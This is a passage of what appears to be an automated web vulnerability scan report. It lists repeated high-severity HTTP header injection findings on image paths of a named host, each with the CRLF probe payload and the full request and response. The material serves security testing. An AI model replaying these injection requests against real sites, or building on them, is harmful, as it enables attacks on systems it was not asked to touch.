User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3d3b2
658a9609ca0/back-front.jpg
Vary: Accept-Encoding
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3d3b2
658a9609ca0/back-front.j
...[SNIP]...
|
1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/banr_techcorner.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 9f5da%0d%0a4c3efec7957 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9f5da%0d%0a4c3efec7957/banr_techcorner.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Location: http://utdi.com/9f5da
4c3efec7957/banr_techcorner.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/9f5da
4c3efec7957/banr_techcor
...[SNIP]...
|
1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/box-1.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload e96a7%0d%0a0a5e41817ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e96a7%0d%0a0a5e41817ac/box-1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:26 GMT
Server: Apache
Location: http://utdi.com/e96a7
0a5e41817ac/box-1.jpg
Vary: Accept-Encoding
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:19 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/e96a7
0a5e41817ac/box-1.jpg">h
...[SNIP]...
|
1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/box-enews.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload b64f6%0d%0a348ab3e51c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /b64f6%0d%0a348ab3e51c0/box-enews.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/b64f6
348ab3e51c0/box-enews.jpg
Vary: Accept-Encoding
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:16 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/b64f6
348ab3e51c0/box-enews.jp
...[SNIP]...
|
1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/gpx_avaya_ip500sml.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload fac4e%0d%0ab27292b2e6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fac4e%0d%0ab27292b2e6f/gpx_avaya_ip500sml.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
Location: http://utdi.com/fac4e
b27292b2e6f/gpx_avaya_ip500sml.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fac4e
b27292b2e6f/gpx_avaya_ip
...[SNIP]...
|
1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/icon_orangecheckball.gif |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3fb1b%0d%0af3643349a48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3fb1b%0d%0af3643349a48/icon_orangecheckball.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3fb1b
f3643349a48/icon_orangecheckball.gif
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3fb1b
f3643349a48/icon_orangec
...[SNIP]...
|
1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/logo-cisco-webex-main.gif |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 94032%0d%0afddf97333c8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /94032%0d%0afddf97333c8/logo-cisco-webex-main.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:22 GMT
Server: Apache
Location: http://utdi.com/94032
fddf97333c8/logo-cisco-webex-main.gif
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/94032
fddf97333c8/logo-cisco-w
...[SNIP]...
|
1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/logo_carousel.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 5253f%0d%0a9daeaf8bf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5253f%0d%0a9daeaf8bf0/logo_carousel.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/5253f
9daeaf8bf0/logo_carousel.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/5253f
9daeaf8bf0/logo_carousel
...[SNIP]...
|
1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/logo_cisco_footer.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 12683%0d%0a12b8b2e3681 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /images12683%0d%0a12b8b2e3681/logo_cisco_footer.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/images12683
12b8b2e3681/logo_cisco_footer.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images12683
12b8b2e3681/logo_c
...[SNIP]...
|
1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/logo_nortel4.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 71fda%0d%0a954ff42a597 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /71fda%0d%0a954ff42a597/logo_nortel4.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/71fda
954ff42a597/logo_nortel4.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/71fda
954ff42a597/logo_nortel4
...[SNIP]...
|
1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/mainhead_partners.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload f3e47%0d%0a28fa46348f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f3e47%0d%0a28fa46348f5/mainhead_partners.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/f3e47
28fa46348f5/mainhead_partners.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/f3e47
28fa46348f5/mainhead_par
...[SNIP]...
|
1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/mainhead_smartbuys.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7ccfa%0d%0acc135bb4afe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /images7ccfa%0d%0acc135bb4afe/mainhead_smartbuys.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:03 GMT
Server: Apache
Location: http://utdi.com/images7ccfa
cc135bb4afe/mainhead_smartbuys.jpg
Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images7ccfa
cc135bb4afe/mainhe
...[SNIP]...
|
1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/mainpic_blueguy.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload c530b%0d%0ad59940e884 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c530b%0d%0ad59940e884/mainpic_blueguy.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/c530b
d59940e884/mainpic_blueguy.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/c530b
d59940e884/mainpic_blueg
...[SNIP]...
|
1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/mainpic_blueheadline.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 111fb%0d%0aa1ffc884fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /111fb%0d%0aa1ffc884fd6/mainpic_blueheadline.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/111fb
a1ffc884fd6/mainpic_blueheadline.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/111fb
a1ffc884fd6/mainpic_blue
...[SNIP]...
|
1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://utdi.reachlocal.net |
| Path: |
/images/navbutton_about-ovr.jpg |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ac19a%0d%0a7030fac53e2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ac19a%0d%0a7030fac53e2/navbutton_about-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
